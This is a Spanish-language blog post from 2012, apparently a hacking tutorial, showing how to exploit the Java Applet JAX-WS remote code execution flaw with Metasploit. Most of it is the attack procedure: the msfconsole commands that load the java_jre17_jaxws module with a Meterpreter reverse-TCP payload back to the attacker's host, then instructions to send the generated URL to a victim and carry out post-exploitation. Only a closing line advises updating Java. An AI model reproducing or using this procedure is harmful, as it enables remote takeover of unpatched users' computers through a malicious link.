17 de nov. de 2012

Java Applet JAX-WS Remote Code Execution [Explotando con MSF + Vídeo]

Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.

El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.

El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.

Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.

REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Google Chorme, Firefox o IE (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
use exploit/multi/browser/java_jre17_jaxws
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.19
set TARGET 1
set LHOST 192.168.1.19
exploit



Como ya es de conocimiento y costumbre, estos comandos creara una URL que sera enviada a al usuario para que lo ejecute desde cualquier navegador web, ya sea Google Chorme, Firefox, Internet Explorer u Opera que contenga la version del Java vulnerable 1.7.0_07-b10 y anteriores.


Seguidamente si el usuario logra ejecutar la URL generada en cualquier Sistema Operativo o Navegador, lograremos obtener una session metepreter como se aprecia en la siguiente imagen:


Por lo tanto, solo quedaría ejecutar los respectivos comandos de Explotación y Post-Explotacion para aprovecharnos del sistema que hemos vulnerable con una simple URL gracias a este nuevo exploit recién salida del horno.



VIDEO-TUTORIAL:


Para no ser victima de este Ataque, se recomienda actualizar el Java a la ultima versión disponible, que se puede descargar haciendo clic Aqui.
Un saludo.

Autor: @CalebDrugs